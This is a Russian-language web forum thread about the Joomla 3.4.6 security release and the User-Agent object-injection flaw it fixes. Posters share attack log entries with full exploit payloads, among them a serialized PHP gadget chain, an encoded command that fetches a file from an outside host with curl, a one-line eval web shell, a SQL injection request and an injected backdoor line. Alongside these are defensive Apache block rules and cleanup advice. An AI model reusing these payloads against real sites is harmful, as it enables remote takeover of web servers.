0 Пользователей и 1 Гость просматривают эту тему.
  • 127 Ответов
  • 7379 Просмотров
*

jurassik

  • Давно я тут
  • 668
  • 51 / 1
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #30 : 15.12.2015, 11:48:03 »
при обновлении 3х сайтов на хостинге nic c Joomla! 3.4.5 до Joomla! 3.4.6 белая страница.
откатился назад.
на других хостингах норма.
сам шучу - сам смеюсь
*

Olg

  • Завсегдатай
  • 1065
  • 80 / 1
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #31 : 15.12.2015, 11:53:26 »
при обновлении 3х сайтов на хостинге nic c Joomla! 3.4.5 до Joomla! 3.4.6 белая страница.
откатился назад.
на других хостингах норма.
Одна из возможных причин.
*

revisium

  • Осваиваюсь на форуме
  • 37
  • 11 / 0
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #32 : 15.12.2015, 11:54:09 »
Вчера выпустили хотфиксы для Joomla 1.5 и 2.5
https://docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
--
http://revisium.com/ - лечение сайтов и защита от взлома.
*

wishlight

  • Живу я здесь
  • 4235
  • 255 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #33 : 15.12.2015, 12:07:06 »
Вчера выпустили хотфиксы

На свои сайты уже поставил
*

Филипп Сорокин

  • Сорокин Band
  • 1868
  • 153 / 4
  • разработчик.москва
Re: Новый резил безопасности Joomla! 3.4.6
« Ответ #34 : 15.12.2015, 13:01:41 »
Блокирование атаки средствами Apache для тех, кто не может (или не хочет) обновиться:

Код
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysqli? [NC]
RewriteRule .? - [F]
*

12mv

  • Давно я тут
  • 527
  • 20 / 0
  • Гульсина
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #35 : 15.12.2015, 13:28:28 »
Блокирование атаки средствами Apache для тех, кто не может (или не хочет) обновиться:

Код
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} JDatabaseDriverMysqli? [NC]
RewriteRule .? - [F]

И что это даёт? можно подробнее? )
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #36 : 15.12.2015, 13:49:42 »
Мдаа... 10 лет...
@b2z
да
Последние четыре года все дырки, это ощущение что это были специально реализованные бэкдоры, просто сейчас их массово находят сторонние, и их закрывают.
И что нас еще ждет, тогда?
*

wishlight

  • Живу я здесь
  • 4235
  • 255 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #37 : 15.12.2015, 13:53:12 »
И что это даёт? можно подробнее? )

Запрос редиректит в другой.
*

b2z

  • Глобальный модератор
  • 6959
  • 755 / 0
  • Разраблю понемногу
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #38 : 15.12.2015, 14:32:55 »
@b2z
да
Последние четыре года все дырки, это ощущение что это были специально реализованные бэкдоры, просто сейчас их массово находят сторонние, и их закрывают.
И что нас еще ждет, тогда?
А никто не знает. К сожалению, это реалии разработки - дыры будут вылазить всегда, это вопрос времени. Уверен, что не только в Joomla.
*

Филипп Сорокин

  • Сорокин Band
  • 1868
  • 153 / 4
  • разработчик.москва
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #39 : 15.12.2015, 15:13:45 »
И что это даёт? можно подробнее? )

Если в строке User Agent присутствуют признаки инъекции, то Apache блокирует соединение. Удаленное исполнение кода возможно при помощи подделки строки User Agent, которая помещается в БД без обработки.

Запрос редиректит в другой.

Там нет редиректа, есть запрет доступа.
*

wishlight

  • Живу я здесь
  • 4235
  • 255 / 1
  • 300 руб очень быстрый хостинг в ЕС
*

SeregaC

  • Новичок
  • 3
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #41 : 15.12.2015, 20:33:32 »
рекомендуется поискать в логах “JDatabaseDriverMysqli” или “O:” в User Agent, проверив, не был ли уже применен эксплоит

нашел в логах вот это
Цитировать
77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил
*

Physicist

  • Глобальный модератор
  • 924
  • 186 / 0
  • Рябов Денис
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #42 : 15.12.2015, 20:55:13 »
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
Проверять файловую систему на наличие сторонних или измененных файлов (могли загрузить шелл) и базу данных на добавленных администраторов.
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #43 : 15.12.2015, 21:19:34 »
нашел в логах вот этоя так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

Вы просто из тех кому не повезло.
*

fbr

  • Завсегдатай
  • 1366
  • 157 / 6
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #44 : 15.12.2015, 21:59:03 »
Сайты на https кто-нибудь обновлял?
Мне сегодня человек написал, что после обновления слетели все стили
Я посмотреть не успел, он его уже откатил ...
*

Physicist

  • Глобальный модератор
  • 924
  • 186 / 0
  • Рябов Денис
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #45 : 15.12.2015, 22:41:27 »
Вот тут выложили нагрузку, которую выполняли на сайтах вчера: http://pastebin.com/e25zxcn6
(из обсуждения на https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html)

Выполняет следующее:
1. Полностью сливает configuration.php.
2. Патчит index.php, includes/framework.php, includes/defines.php.
3. Сохраняет одну-две копии шелла в случайно выбранных директориях, доступных на запись. По-идее, эти файлы можно найти чем-то вроде

find . -regex '(?:sort|conf|utf8|cp1251|backup|cache|reverse|bin|cgi|memcache|sql)-[0-9a-f]{2,3}\.php'

Только учтите, что сейчас уже есть готовый модуль для Metasploit и нагрузка может быть произвольной.
*

SeregaC

  • Новичок
  • 3
  • 0 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #46 : 15.12.2015, 22:52:19 »
Проверять файловую систему на наличие сторонних или измененных файлов (могли загрузить шелл) и базу данных на добавленных администраторов.
Спасибо, ничего подозрительного не нашел, потому что не знаю что искать, просто восстановил сайт из резервной копии

Сайты на https кто-нибудь обновлял?
Мне сегодня человек написал, что после обновления слетели все стили
Я посмотреть не успел, он его уже откатил ...
у меня https - все нормально
*

mocart

  • Захожу иногда
  • 112
  • 9 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #47 : 15.12.2015, 23:34:04 »
нашел в логах вот это
Код
77.247.181.162 - - [15/Dec/2015:19:14:19 +0300] "GET / HTTP/1.0" 200 12440 "http://***.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
я так понимаю что применили эксплоит, чем это грозит, подскажите, что делать и нужно ли что то делать?
новый релиз поставил

Тоже у себя нашел, но несколькими часами ранее обновился.
IP 36.250.176.75 сначала запросил htaccess.txt, далее это, следующим действием было
Код
"GET //?1=ZnB1dHMoZm9wZW4oInNpdGVtYS5waHAiLCJ3IiksJzw/cGhwIGV2YWwoJF9QT1NUWzFdKTs/PicpO3BocGluZm8oKTs= HTTP/1.0"
***
GET //?1=fputs(fopen("sitema.php","w"),'<?php eval($_POST[1]);?>');phpinfo();
 
И последнее действие от этого ip:
Код
"GET /index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=1&type_id=1&list%5Bselect%5D=(select%201%20from%20(select%20count(*),concat((select%200x6275677363616E776B),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.0"
*

al707

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
  • Тамиров Александр
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #48 : 16.12.2015, 02:16:42 »
анализ логов некоторых моих сайтов показал атаки с IP

89.234.157.254 - - [15/Dec/2015:18:57:01 +0300]
77.247.181.165 - - [15/Dec/2015:18:50:46 +0300]
173.14.173.227 - - [15/Dec/2015:19:37:34 +0300]
171.25.193.131 - - [15/Dec/2015:19:30:08 +0300]
Какая разница, IP прокси-серверов, TOR, компьютеры ботнетов и  т. п.
Матчасть нужно учить - исходники Joomla, исходники PHP на C и т. п.
https://www.cvedetails.com/vulnerability-list/vendor_id-3496/product_id-16499/Joomla-Joomla-.html
Наверняка это верхушка айсберга..
Люблю изучать то, что считаю перспективным, делиться опытом, иногда помогать. Частный вебмастер
*

b2z

  • Глобальный модератор
  • 6959
  • 755 / 0
  • Разраблю понемногу
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #49 : 16.12.2015, 08:12:02 »
Чего за паника, какая верхушка? Так можно сказать о любом движке. Да, сложилось так, что у Joomla нашли подряд несколько, но до этого очень долго ничего не находили.

https://www.cvedetails.com/vendor/3496/Joomla.html
https://www.cvedetails.com/vendor/2337/Wordpress.html
https://www.cvedetails.com/vendor/1367/Drupal.html
*

fatalerror

  • Захожу иногда
  • 444
  • 48 / 2
  • Уполномоченный по правам чайников
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #50 : 16.12.2015, 08:26:21 »
У себя нашел подряд несколько

Код
195.22.126.198 - - [16/Dec/2015:06:30:22 +0600] "GET / HTTP/1.0" 200 3048 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:954:\"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"

И сразу за этим

Код
195.22.126.198 - - [16/Dec/2015:06:30:23 +0600] "GET /components/com_media/ajax.php HTTP/1.0" 404 307 "-" "curl/7.26.0"

Вчера вечером, правда, обновился. Бегло просмотрел - кажется файлы сегодня не менялись...

Может грохнуть сайт, да по новой накатить? все одно в разработке, там на день делов. Что посоветуете?
Расстреляно форумчан за нецензурщину: 1 (один).  Дерьмо случается...
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #51 : 16.12.2015, 12:29:14 »
Чего за паника, какая верхушка?
@b2z
Думаю это не паника, просто интерес. Это хорошо что у кого то есть интерес и они тратят свое время на изучение каких либо моментов, они могут неправильно что то трактовать, но и информацию соберут и донесут до тех кто ей возможно воспользуется.
*

master-smeta

  • Захожу иногда
  • 275
  • 9 / 0
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #52 : 16.12.2015, 13:05:21 »
нашел у себя в логах это:
Спойлер
[свернуть]
также были изменены файлы index.php (в корне сайта) и /includes/defines.php
в них добавлена такая гадость:
Код
if (isset($_REQUEST["aBE"])) {@extract($_REQUEST);@die($aBE($Ft));}
файлы почистил, все пароли сменил. посмотрим, что будет дальше
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #53 : 16.12.2015, 13:13:14 »
Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.
*

fsv

  • Живу я здесь
  • 2601
  • 377 / 2
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #54 : 16.12.2015, 13:22:58 »
Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Если в логах это я вижу по времени после обновления, это значит "взломали" или "пытались взломать"?
Несколько сайтов на J1.5 (разные клиенты старые). Стоит ли их озадачивать этой новой работой (проверка сайта)? Есть данные?
Веб-разработка: заказ. Только сложная и объемная разработка. Дорого.
*

wishlight

  • Живу я здесь
  • 4235
  • 255 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #55 : 16.12.2015, 13:26:18 »
Уязвимы все версии Joomla. Стоит.
*

al707

  • Осваиваюсь на форуме
  • 42
  • 2 / 0
  • Тамиров Александр
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #56 : 16.12.2015, 13:27:02 »
Чего за паника, какая верхушка? Так можно сказать о любом движке. Да, сложилось так, что у Joomla нашли подряд несколько, но до этого очень долго ничего не находили.

https://www.cvedetails.com/vendor/3496/Joomla.html
https://www.cvedetails.com/vendor/2337/Wordpress.html
https://www.cvedetails.com/vendor/1367/Drupal.html
А я не говорил, что такая ситуация только с Joomla, с другими движками, наверное даже хуже. Впрочем, как и если выйти из рамок программирования, и оглянуться на мир в целом.. Кто не включает голову, тот тихо исчезнет в силу естественного отбора ))
« Последнее редактирование: 16.12.2015, 13:30:16 от al707 »
Люблю изучать то, что считаю перспективным, делиться опытом, иногда помогать. Частный вебмастер
*

fsv

  • Живу я здесь
  • 2601
  • 377 / 2
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #57 : 16.12.2015, 13:28:54 »
Уязвимы все версии Joomla. Стоит.
Я не совсем это спрашивал. Обновление было. В логах появились записи после обновления.
Веб-разработка: заказ. Только сложная и объемная разработка. Дорого.
*

Филипп Сорокин

  • Сорокин Band
  • 1868
  • 153 / 4
  • разработчик.москва
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #58 : 16.12.2015, 13:36:50 »
Вам не просто файлы почистить теперь надо, вам надо просканировать весь сайт на предмет стороннего кода.

Важно! Если кто видит у себя в логах
Код
JDatabaseDriverMysqli
или
Код
O:
это означает что вас уже взломали!
Искать требуется Вам теперь сторонний код на сайте, полностью сканировать и чистить, если хостинг и несколько сайтов то на всех соседних которые не разграничены по правам и пользователям.

Это означает, что кто-то подменил строку User Agent. Сей факт подтверждает лишь факт атаки, но не взлома.
*

voland

  • Легенда
  • 10014
  • 549 / 107
  • Эта строка съедает место на вашем мониторе
Re: Новый релиз безопасности Joomla! 3.4.6
« Ответ #59 : 16.12.2015, 13:37:24 »
Если в логах это я вижу по времени после обновления, это значит "взломали" или "пытались взломать"?
Несколько сайтов на J1.5 (разные клиенты старые). Стоит ли их озадачивать этой новой работой (проверка сайта)? Есть данные?
Если после - то пытались взломать
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

0 - Обнаружена ошибка. Call to undefined method Joomla\Registry\Registry::getVa

Автор Victor333

Ответов: 22
Просмотров: 342
Последний ответ 09.11.2018, 11:46:17
от Victor333
Редактирование шаблона админки Joomla. Формы размещения статьи [Решено]

Автор Eholov

Ответов: 8
Просмотров: 324
Последний ответ 18.10.2018, 21:16:55
от lexxbry
Медиа менеджер и редактор фоток в Joomla

Автор informprostor

Ответов: 13
Просмотров: 587
Последний ответ 17.10.2018, 20:05:33
от informprostor
Как исправить ошибку Error: 500 при обновлении Joomla до 3.8.1?

Автор Dmitry T.

Ответов: 7
Просмотров: 1177
Последний ответ 16.10.2018, 23:38:46
от Septdir
После обновления до Joomla 3.7 в админке в меню "Компоненты" пропали пункты

Автор lolitma3

Ответов: 37
Просмотров: 5420
Последний ответ 11.10.2018, 16:28:28
от khan-alex